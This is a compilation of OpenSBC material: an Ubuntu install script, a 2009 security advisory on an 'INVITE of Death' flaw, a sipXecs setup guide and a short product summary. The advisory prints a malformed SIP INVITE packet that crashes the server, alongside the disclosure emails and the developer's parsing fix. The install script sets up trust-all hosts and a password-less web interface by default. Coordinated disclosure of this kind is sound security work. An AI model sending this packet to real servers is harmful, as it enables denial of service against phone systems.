Ballistic-PBX / install-opensbc-ubuntu.sh

#!/bin/bash

#OpenSBC Debian



#/bin/sh

#Install OpenSBC - CentOS edition

#Copyright (C) 2010 Star2Billing S.L.

#Author Jonathan Roper jonathan@star2billing.com



#This program is free software; you can redistribute it and/or

#modify it under the terms of the GNU General Public License

#as published by the Free Software Foundation; either version 2

#of the License, or (at your option) any later version.



#This program is distributed in the hope that it will be useful,

#but WITHOUT ANY WARRANTY; without even the implied warranty of

#MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the

#GNU General Public License for more details.



#You should have received a copy of the GNU General Public License

#along with this program; if not, write to the Free Software

#Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.



#==================================================================================================

#This script will install OpenSBC on an existing asterisk server, and will be available on port 5061

#It will provide upwards registration, and RTP proxy services.

#No configuration in Asterisk is required.

#Simply point your phone at <<IPADDR>>:5061

#If this is installed behind NAT, forward UDP 5061 and 10,000 > 20,000

#==================================================================================================



apt-get update



apt-get install -y mc autoconf automake cvs flex expat libexpat1-dev libtool build-essential libxml2 libxml2-dev

libtiff4 libtiff4-dev libssl-dev libncurses5-dev bison libaudiofile-dev subversion libnewt-dev libcurl3-dev

libnet-ssleay-perl openssl ssl-cert libauthen-pam-perl libio-pty-perl libcrypt-passwdmd5-perl libdigest-md5-perl

libpg-perl libdbd-pg-perl openssl ssl-cert flex bison build-essential libxml2 libxml2-dev expat libexpat1-dev libspeex-dev speex





cd /usr/src



echo "================================================================================"

echo "When prompted for a CVS password, just press enter"

echo "================================================================================"





cvs -d:pserver:anonymous@opensipstack.cvs.sourceforge.net:/cvsroot/opensipstack login

cvs -z3 -d:pserver:anonymous@opensipstack.cvs.sourceforge.net:/cvsroot/opensipstack co -P opensipstack

cvs -z3 -d:pserver:anonymous@opensipstack.cvs.sourceforge.net:/cvsroot/opensipstack co -P opensbc



cd /usr/src/opensipstack/

chmod +x ./configure

./configure --enable-localspeex --enable-gpllibs

make bothnoshared

cd ../opensbc

chmod +x ./configure

./configure --enable-gpllibs

make bothnoshared

make distrib





cp /usr/src/opensbc/distrib/* /usr/local/bin/

echo "/usr/local/bin/opensbc -d -p /var/run/opensbc.pid -H 65536 -C 1024000" > /usr/local/bin/startup.sh

echo "/usr/local/bin/opensbc -u root -k -p /var/run/opensbc.pid" > /usr/local/bin/shutdown.sh



echo "/usr/local/bin/startup.sh"  >> /etc/rc.local



mkdir /root/OpenSIPStack

mkdir /root/OpenSIPStack/OpenSBC_data





echo "

[OpenSBC-General-Parameters]

SIP-Log-Level=1

PTRACE-Log-Level=1

Log-File-Prefix=b2bua

SBC-Application-Mode=B2BUpperReg Mode

Enable-Trunk-Port=True

Enable-Calea-Port=True

RTP-Min-Port=10000

RTP-Max-Port=20000

NAT-Keep-Alive-Interval=15

Send-OPTIONS-NAT-Keep-Alive=True

Send-Responses-Using-New-Socket=False

Enable-Local-Refer=False

Disable-Refer-Optimization=True

Max-Forwards=70

Encryption-Mode=XOR

Encryption-Key=GS

Alerting-Timeout=30000

Seize-Timeout=60000

SIP-Timer-B=Default

SIP-Timer-H=Default

Session-Keep-Alive=1800

Session-Max-Life-Span=10800

Max-Concurrent-Session=100

Max-Call-Rate-Per-Second=10



[SIP-Transports]

Main-Interface-Address Array Size=1

Main-Interface-Address 1=sip:*:5061

Backdoor-Interface-Address=sip:*:5062

Trunk-Interface-Address=sip:*:5064

Media-Server-Interface-Address=sip:*:5066

CALEA-Interface-Address=sip:*:5068

Auxiliary-Interface-Address=sip:*:5070

Interface-Route-List Array Size=0



[RTP-Proxy]

Proxy-On-Private-Contact=True

Proxy-On-via-received-vs-signaling-address=True

Proxy-On-Private-Via=True

Proxy-On-Different-RPORT=True

Proxy-All-Media=False



[Trusted-Domains]

Accept-All-Calls=True

Trusted-Domain-List Array Size=0

X-Remote-Info-List Array Size=0



[Host-Access-List]

Trust-All-Hosts=True

Trusted-Host-List Array Size=0

Enable-Selective-Banning=True

Banned-Host-List Array Size=0



[Upper-Registration]

All-Reg-As-Upper-Reg=True

Enable-Stateful-Reg=False

Rewrite-TO-Domain=True

Rewrite-FROM-Domain=True

Route-List Array Size=1

Route-List 1=[sip:*] sip:127.0.0.1:5060



[B2BUA-Routes]

Route-List Array Size=1

Route-List 1=[sip:*] sip:127.0.0.1:5060

Insert-Route-Header=True

Rewrite-TO-URI=True

Prepend-ISUP-OLI=False

Route-By-Request-URI=False

Route-By-To-URI=False

Drop-Routes-On-Ping-Timeout=False

Use-External-XML=False

External-XML-File=b2bua-route.xml



" > /root/OpenSIPStack/OpenSBC_data/OpenSBC.ini





echo "================================================================================"

echo "The web interface for this is on <<ipaddress>:9999"

echo "By default it has no password on it"

echo "After reboot, please go to the website and configure a username and password"

echo "================================================================================"

echo "Please reboot"

echo "================================================================================"





echo "

1. http://11.22.33.44:9999/Internal-DNS-Mapping



This is where we create the DNS entries for the internal IP addresses, this not compulsory, but it does make admin easier.



So assuming you have pbx.yourdomain.com on 192.168.1.101, 



Create a DNS entry on your DNS server for pbx.yourdomain.com = 11.22.33.44

Now add the internal DNS mapping with [sip:pbx.yourdomain.com] sip:192.168.1.101:5060

Click the update button.

Repeat as necessary for all PBX systems.



2. http://11.22.33.44:9999/Upper-Registration



Next we need to deal with the registration aspect, so that when you create an extension on a PBX, OpenSBC checks to see that it is valid.



Edit Route list, and add entries for each of your PBX systems.

[sip:*@pbx.yourdomain.com:*] sip:pbx.yourdomain.com:5060



or if you have not bothered with Step one - [sip:*@pbx.yourdomain.com:*] sip:192.168.1.101:5060 



Then click the update button



So registrations that are sent to pbx.yourdomain.com will be forwarded to the internal PBX, 

and if the username and password is correct, OpenSBC will allow the endpoint to register. 

Note that the endpoint must be configured with the hostname, e.g. pbx.yourdomain.com, NOT 11.22.33.44



Repeat as necessary for all PBX systems.



3. http://11.22.33.44:9999/B2BUA-Routes



This is how the call is actually routed when someone picks up the phone and makes a call.



The syntax here is the same as in step 2 for upper registration, e.g.Edit Route list, and add entries for each of your PBX systems.



[sip:*@pbx.yourdomain.com:*] sip:pbx.yourdomain.com:5060



or if you have not bothered with Step one - [sip:*@pbx.yourdomain.com:*] sip:192.168.1.101:5060



Then click the update button.





4. Register your endpoint 



Now attempt to register a phone to your extension@pbx.yourdomain.com and make a call.



5. DID forwarding



To forward DID to your systems from your DID provider or A2Billing system, simply forward the DID to sip/DID-Number@pbx.yourdomain.com





Please test and test again, particularly in respect of MWI lights, extension to extension calls and check that it does what you need it do.

" > /root/OpenSIPStack/README











INFO: https://github.com/jonathan-roper/Ballistic-PBX/blob/master/install-opensbc-ubuntu.sh 

OpenSBC (INVITE of Death)

The IMS Security Team

OpenSBC (INVITE of Death)

Advisory Draft Date: 2nd Feburary, 2009.
Release Date: 16th Feburary, 2009.

Affected Application	OpenSBC Server
Severity	High
Status	Disclosed
Reported To	Joegen Baclor (CTO Solegy Systems)
Author	M. Zubair Rafique and Dr. Muddassar Farooq

Background

OpenSBC is an ongoing attempt to create an open-source Session Border Controller that is fully compliant with the mandates of RFC 3261. OpenSBC can be used as a SIP router, media anchor for farend NAT traversal, SIP egress and ingress trunking among others. More information about the server can be found at http://opensipstack.org/

Overview

The INVITE of Death vulnerability in OpenSBC server allows the attacker to crash the server causing remote Denial of Service (DOS). The problem specifically exists in OpenSBC version 1.1.5-25 in the handling of “Via” field caused from maliciously crafted SIP packet.

Proof of Concept

The proof of concept code can be downloaded from here: OpenSBC.pl.
The malicious Packet on which the server crash is shown below:INVITE sip:bob@open-ims.test SIP/2.0
Via:::::: SIP/2.0/UDP localhost.localdomain:5060;branch=z9hG4bK000000
From: 0 ;tag=0
To: Receiver 
Call-ID: 0@localhost.localdomain
CSeq: 1 INVITE
Contact: 0 
Expires: 1200
Max-Forwards: 70
Content-Type: application/sdp
Content-Length: 131
v=0
o=0 0 0 IN IP4 localhost.localdomain
s=Session SDP
c=IN IP4 127.0.0.1
t=0 0
m=audio 9876 RTP/AVP 0
a=rtpmap:0 PCMU/8000

Work Around

The OpenSBC devolpment team has been reported about the vulnerability. Below is the E-mail exchange content between our research team and the CTO of Solegey Systems:

From: This sender is DomainKeys verified "Joegen Baclor" <joegen.baclor@gmail.com> To: m_zubair_rafique@yahoo.com, zubair.rafique@nexginrc.org, "Ali Akbar" <ali.akbar@nexginrc.org> The current version in CVS for OpenSBC is 1.1.5-82 and 1.1.13-17 for OpenSIPStack. The fix is really very simple. I just made sure that leading colons in the header name and trailing colons in the header values are stripped when parsing MIME. Attached is the function call. ---- void ParserTools::SliceMIME( const OString & mime, OString & name, OString & value ) { if( mime.IsEmpty() ) return; PINDEX colon = mime.Find( ": " ); if( colon != P_MAX_INDEX ) { name = mime.Left( colon ); value = mime.Mid( colon + 2 ); }else { colon = mime.Find( ":" ); if( colon != P_MAX_INDEX ) { name = mime.Left( colon ); if( ParserTools::IsKnownHeader( name ) ) value = mime.Mid( colon + 1 ); else { name = ""; value = mime; } }else { value = mime; } } if( !value.IsEmpty() ) { /// strip leading colons from value int leadingColons = 0; for( int i = 0; i < value.GetLength(); i++ ) { if( value[i] == ':' ) leadingColons++; else break; } if( leadingColons > 0 ) value = value.Mid( leadingColons ); } if( !name.IsEmpty() ) { ///strip trailing colons from name int trailingColons = 0; for( int i = name.GetLength() - 1; i >= 0 ; i-- ) { if( name[i] == ':' ) trailingColons++; else break; } if( trailingColons > 0 ) name = name.Left( name.GetSize() - trailingColons - 1 ); } } From: zubair rafique Sent: Friday, February 13, 2009 6:30 PM To: zubair.rafique@nexginrc.org ; Ali Akbar ; Joegen Baclor Subject: Re: Urgent: OpenSBC information request for vulnerabilitydisclosure Dear Jogen, We are grateful of having your feed back on the issue. As we are team of research engineers working on SIP servers (IMS Security) we believe that your coordination in this regard will be helpful for our research. Kindly provide me the release version number of OpenSBC in which the issue has been fixed. I will appreciate it if you could provide us the technical inside of the bug. This will help us in the disclosure of vulnerability and its remedy done by your team. Thank you for coordinating with us. Zubair Rafique --- On Fri, 2/13/09, Joegen Baclor <joegen.baclor@gmail.com> wrote: From: Joegen Baclor <joegen.baclor@gmail.com> Subject: Re: Urgent: OpenSBC information request for vulnerabilitydisclosure To: zubair.rafique@nexginrc.org, "Ali Akbar" <ali.akbar@nexginrc.org> Date: Friday, February 13, 2009, 12:00 PM Hi the issue is now fixed in OpenSBC CVS. Anything, you need me to provide aside from patching our software? -------------------------------------------------- From: <zubair.rafique@nexginrc.org> Sent: Friday, February 13, 2009 3:51 AM To: "Ali Akbar" <ali.akbar@nexginrc.org> Cc: "Joegen Baclor" <joegen.baclor@gmail.com> Subject: Re: Urgent: OpenSBC information request for vulnerabilitydisclosure > Dear Jogen, > > As my colleague Ali Akbar has sent you the mail regarding vulnerability in OpenSBC. This email is reminder, in order to ensure coordination from your side regarding the issue. > > Regards > > Zubair Rafique > > Quoting Ali Akbar <ali.akbar@nexginrc.org>: > >> Dear Joegen, >> >> I am attaching the vulnerability advisory (VA-nexGINRC-2009-01) and Proof of >> Concept (Poc) script with this email. The advisory and PoC are confidential, >> and have not been disclosed to anyone outside the project team. This >> material should enable you to reproduce the server crash scenario on your >> testbed. >> >> We hope to include the description of the vulnerability as an example of SIP >> servers' vulnerability to parsing attacks. The deadline of paper submission >> is 16 Feb 2009. We hope that you get back to us with feedback regarding the >> issue. >> >> Please feel free to contact us regarding any query. >> >> Regards, >> M. Ali Akbar >> >> On Tue, Jan 27, 2009 at 7:37 AM, Joegen Baclor <joegen.baclor@gmail.com>wrote: >> >>> Hi Ali, >>> >>> My name is Joegen Baclor and I am the developer of OpenSBC. You can >>> correspond with me regarding the vulnerability using the e-mail address. >>> >>> Joegen >>> >>> -------------------------------------------------- >>> From: <ali.akbar@nexginrc.org> >>> Sent: Monday, January 26, 2009 4:27 PM >>> To: <joegen@opensipstack.org>; <rdiola@solegy.com> >>> Subject: Urgent: OpenSBC information request for vulnerability disclosure >>> >>> Dear All, >>>> >>>> We are currently working on security assessment of different publicly >>>> availbale SIP servers. OpenSBC is included in the list of selected SIP >>>> servers/proxies. During one of our experiments, we found that OpenSBC >>>> server is vulnerable to a remote DoS exploit. We are eager to share >>>> more information about the exploit with the developer of OpenSBC. We >>>> are also willing to provide assisstance in creation and testing of the >>>> patch. >>>> >>>> We need the contact email address of the developer or the concerned >>>> person. Your help in this regard is highly appreciated. >>>> >>>> >>>> About Me: >>>> I am a research engineer at Next Generation Intelligent Networks >>>> Research Center (nexGIN RC). We are currently working on a research >>>> project that deals with the security of IP Multimedia Subsystem (IMS). >>>> You can find more information about our project at our website >>>> http://www.nexginrc.org/ >>>> >>>> Regards, >>>> Ali >>>> >>>> >>>> >>> >>> >>> >>>> No virus found in this incoming message. >>>> Checked by AVG - http://www.avg.com >>>> Version: 8.0.176 / Virus Database: 270.10.13/1915 - Release Date: >>>> 1/25/2009 6:13 PM >>>> >>>> >> > >

Credits

The vulnerability was discovered by Zubair Rafique and Sohail Aziz from the IMS security research project team.

Contact

M. Zubair Rafique                       M. Ali Akbar
Zubair.rafique@nexginrc.org       ali.akbar@nexginrc.org
+92-346-5356929                     +92-321-2936105

Disclaimer

The contents of this advisory are copyright (c) 2009 nexGIN RC , and may be distributed freely provided that no fee is charged for this distribution and proper credit is given. 

LINK: http://ims-bisf.nexginrc.org/OpenSBC-vul.html

OpenSBC Setup Guide

Setup:

• OS: Fedora 8
• No.of NIC: two, both with Public IP Address
  SipXecs and OSBC are installed on the same box, each using a separate IP address
• UA's: Behind NAT

LINK: http://wiki.sipfoundry.org/display/sipXecs/OpenSBC+Setup+Guide

This document will attempt to provide working OpenSBC configurations for a few commonly used sipxecs calling scenarios. It is a work in progress, so please check back often. For any questions or comments, contact the author (raymund.nones [at] gmail.com) or post to the OpenSBC forum at http://www.opensourcesip.org.

This page is work in progress. It will have more screenshots for Linux, OSBC and SipXecs and a more clearer guide.

Scenario #1: Using OSBC for Far End NAT Traversal(FENT) - Public .

This enables remote workers on the WAN to access a sipXecs instance, where sipXecs has a public IP address, from behind NAT routers.

Setup:

• OS: Fedora 8
• No.of NIC: two, both with Public IP Address
  SipXecs and OSBC are installed on the same box, each using a separate IP address
• UA's: Behind NAT

Dues to a limitation where the gateway configured in sipxecs always uses port 5060, OSBC can not be used for FENT and SIP Trunking simultaneously.

1.a Registering a NAT'd UA to sipxecs through OSBC with UpperReg(without and with domain rewriting)

In OSBC:
Setting OSBC with UpperReg Mode:

1. Go to OSBC General Parameters
2. Select B2BUpperReg Mode
3. Press Update (Note: After Update you need to restart OSBC)

Setting OSBC to listen to a specific interface:

1. Go to OSBC General Parameters
2. Input the interface address at the Interface Address Field and Click Add
3. Press Update (Note: After Update you need to restart OSBC)

Setting OSBC Upper Registration

1. Go to Upper Registration
2. Input the Route at the Route-List Field and select Add
   for the given example route: [sip:*] sip:sipx.example.com
   this will route all traffic from OSBC to SipX instance at sipx.example.com

   For domain rewriting, click the check box for Domain Rewriting (i'll be giving examples regarding the Rewrite Feature on my next update)

   If Rewrite-TO-Domain is check, domain of the To-URI will be rewritten and use the domain parameter of the route-uri.
   If Rewrite-FROM-Domain is check, domain of the From-URI will be rewritten and use the domain parameter of the route-uri
3. Press Update

In SipXecs:

1. Create a user / extension ex. Uid: 200 Pw: 200

In UA:

1. Setup your phone
   Uid: 200 Pw: 200
   Domain: sipx.example.com <-- this domain should resolve to the IP address of your SipXecs instance
   Proxy: osbc.example.com <-- tjis domain should resolve to the IP address of your OSBC instance

1.b Calls between UAs behind NAT

Callflow: UA1 ? OSBC ? SIPX ? OSBC ? UA2
In OSBC:

1. Using the settings for OSBC from Scenario #1, Go to B2BUA Routes
2. Add Routes to Route-List
   Ex. [sip:*] sip:sipx.example.com
   for the given example route: [sip:*] sip:sipx.example.com this will route all calls from OSBC to SipX instance at sipx.example.com
3. Press Update

In SipXecs:

1. Create two users / extensions ex.
   Uid: 200 Pw: 200
   Uid: 201 Pw: 201

In UA:

1. Setup your phones
   Uid: 200 Pw: 200
   Domain: sipx.example.com <-- this domain should resolve to the IP address of your SipXecs instance
   Proxy: osbc.example.com <-- this domain should resolve to the IP address of your OSBC instance
   Uid: 201 Pw: 201
   Domain: sipx.example.com <-- this domain should resolve to the IP address of your SipXecs instance
   Proxy: osbc.example.com <-- this domain should resolve to the IP address of your OSBC instance

1.c Calls to PSTN, UAs behind NAT

Callflow: UA1 ? OSBC ? SIPX ? OSBC _-> PSTN Gateway
In OSBC:

1. Using the settings for OSBC from Scenario #1, Go to B2BUA Routes
2. Add Routes to Route-List
   Ex.
   [sip:*] sip:sipx.example.com
   for the given example route: [sip:*] sip:sipx.example.com this will route all calls from OSBC to SipX instance at sipx.example.com
   [sip:12*] sip:mypstngateway
   for the given example route: [sip:12*] sip:mypstngateway this will route all calls starting with 12(Prefix 9 was drop by SipXecs for outgoing call) from OSBC to PSTN Gateway
3. Press Update

In SipXecs:

1. Create users / extensions ex.
   Uid: 200 Pw: 200
2. Setup your Gateway at SipXecs (Point your Gateway to OSBC Instance)

In UA:

1. Setup your phones
   Uid: 200 Pw: 200
   Domain: sipx.example.com <-- your SipXecs instance
   Proxy: osbc.example.com <-- your OSBC instance

1.d Calls From PSTN, UAs behind NAT

Callflow: PSTN Caller ? OSBC ? SIPX ? OSBC ? UA1
In OSBC:

1. Using the settings for OSBC from Scenario #1, Go to B2BUA Routes
2. Add Routes to Route-List
   Ex. [sip:12345678] sip:100@sipx.example.com

   replace 12345678 with your correct DID number

   for the given example route: [sip:12345678] sip:100@sipx.example.com this will route calls from OSBC(12345678) to SipX AutoAttendant(indicated by ext 100 or replace with 200 to go directly to extension) at sipx.example.com
3. Press Update

In SipXecs:

1. Create users / extensions ex.
   Uid: 200 Pw: 200

In UA:

1. Setup your phones
   Uid: 200 Pw: 200
   Domain: sipx.example.com <-- your SipXecs instance
   Proxy: osbc.example.com <-- your OSBC instance

Scenario #2: Using OSBC for Far End NAT Traversal (FENT) - Private.

This enables remote workers on the WAN to access a sipxecs instance, where SIPX has a private IP address, from behind NAT routers.

Setup:

• OS: Fedora 8
• No.of NIC: two, One with Public IP Address and the other with a Private IP Address
• SipXecs and OSBC are installed on the same box, each using a separate IP address
• UA's: registered to sipxecs on a local network using private IP addresses, there is no NAT traversal involved.

Dues to a limitation where the gateway configured in sipxecs always uses port 5060, OSBC can not be used for FENT and SIP Trunking simultaneously.

2.a Calls to PSTN, UAs and SipXecs on a Local Network

Callflow: UA1 ? SIPX ? OSBC _-> PSTN Gateway
In OSBC:

1. Go to B2BUA Routes
2. Add Routes to Route-List
   Ex.
   [sip:12*] sip:mypstngateway
   for the given example route: [sip:12*] sip:mypstngateway this will route all calls starting with 12(Prefix 9 was drop by SipXecs for outgoing call) from OSBC to PSTN Gateway
3. Press Update

In SipXecs:

1. Create two users / extensions ex.
   Uid: 200 Pw: 200
2. Setup your Gateway at SipXecs (Point your Gateway to OSBC Instance)

In UA:

1. Setup your phones
   Uid: 200 Pw: 200
   Domain: sipx.example.com <-- your SipXecs instance

2.b Calls from PSTN, UAs and SipXecs on a Local Network

Callflow: PSTN Caller ? OSBC ? SIPX ? UA1
In OSBC:

1. Go to B2BUA Routes
2. Add Routes to Route-List
   Ex. [sip:12345678] sip:100@sipx.example.com

   replace 12345678 with your correct DID number

   for the given example route: [sip:12345678] sip:100@sipx.example.com this will route calls from OSBC(12345678) to SipX AutoAttendant(indicated by ext 100 or replace with 200 to go directly to extension) at sipx.example.com(local SipXecs Address)
3. Press Update

In SipXecs:

1. Create users / extensions ex.
   Uid: 200 Pw: 200

In UA:

1. Setup your phones
   Uid: 200 Pw: 200
   Domain: sipx.example.com <-- your SipXecs instance

Scenario #3: Using OSBC for SIP trunking (this example uses RingCentral).

This enables sipxecs users on a local private network to connect to the PSTN using a SIP Trunk account on the public network.

Setup:

• OS: Fedora 8
• No.of NIC: two, One with Public IP Address and the other with a Private IP Address
• SipXecs and OSBC are installed on the same box, each using a separate IP address
• UA's: registered to sipxecs on a local network using private IP addresses, there is no NAT traversal involved.
• SIP Trunk provider: This call flow was tested using a RingCentral account

Dues to a limitation where the gateway configured in sipxecs always uses port 5060, OSBC can not be used for FENT and SIP Trunking simultaneously.

3.a Registering OSBC to the SIP Trunk*

In OSBC:
Setting OSBC to Register to a Sip Trunk Provider:

1. Go to OSBC Sip Trunk Config
2. Paste the XML for the config (sample below)

   <root> <siptrunk trunk-name="my.sipprovider.com" route-set="sip:sip.sipprovider.com" sip-domain="sip.sipprovider.com" expires="10"> <trunk-accounts> <account user-name="xxxxxxx" auth-user-name="xxxxxx" auth-password="xxxxxx" inbound-route="sip:100@sipx.example.com" expires="3600"/> </trunk-accounts> <transient-accounts> <account user-name="xxxxx" auth-user-name="xxxx" auth-password="xxxx" inbound-route="sip:100@sipx.example.com" expires="3600"/> </transient-accounts> </siptrunk> </root>

3. Press Update
4. To check if registration is successful, Go to Sip-Trunk Registration Status
   sip:xxxxxxx@sip.sipprovider.com sip:xxxxxx@xxx.xxx.xx.xx:5066 00773236-91be-dd11-8be9-e96beb558260@sip.sipprovider.com SIP/2.0 200 OK

3.b Routing of inbound calls from a trunk provider to the sipxecs autoattendant

Callflow: Caller ? SipTrunk Provider ? OSBC ? SipX
In OSBC:

1. After Registration to a Trunk Provider from Scenario 3.a
2. Go to B2BUA Routes
3. Add Routes to Route-List
   Ex. [sip:100*] sip:sipx.example.com
   for the given example route: [sip:100*] sip:sipx.example.com this will route all calls with prefix 100 from OSBC to SipXecs Auto Attendant at sipx.example.com
4. Press Update

In SipXecs:

1. Create users / extensions ex.
   Uid: 200 Pw: 200

In UA:

1. Setup your phones
   Uid: 200 Pw: 200
   Domain: sipx.example.com <-- your SipXecs instance

3.c Routing of outbound calls from a trunk provider

Call Flow: UA1 ? SIPX ? OSBC _-> Sip Trunk Provider
In OSBC:

1. Go to B2BUA Routes
2. Add Routes to Route-List
   Ex. [sip:12*] sip:sip.ringcentral.com;sip-trunk=true
   for the given example route: [sip:12*] sip:sip.ringcentral.com;sip-trunk=true, this will route all calls starting with 12(Prefix 9 was drop by SipXecs for outgoing call) from OSBC to Sip Trunk Provider (in this case, Ring Central)
3. Press Update

In SipXecs:

1. Create users / extensions ex.
   Uid: 200 Pw: 200
2. Setup your Gateway at SipXecs (Point your Gateway to OSBC Instance)

In UA:

1. Setup your phones
   Uid: 200 Pw: 200
   Domain: sipx.example.com <-- your SipXecs instance

INFO: http://wiki.sipfoundry.org/display/sipXecs/Overview

OpenSBC : OpenSBC is an open source (MPL License) Session Border Controller and B2BUA.

OpenSBC

OpenSBC is an open source (MPL License) Session Border Controller and B2BUA.
Features

• Registrations
• B2BUA
• NAT traversal
• ENUM

Open SBC has been under developement and in use for 7 years in high volume applications.

Commerical support is available from the original developers.

See Also

• NAT and VOIP
• Session Border Controller

INFO: http://www.voip-info.org/wiki/view/OpenSBC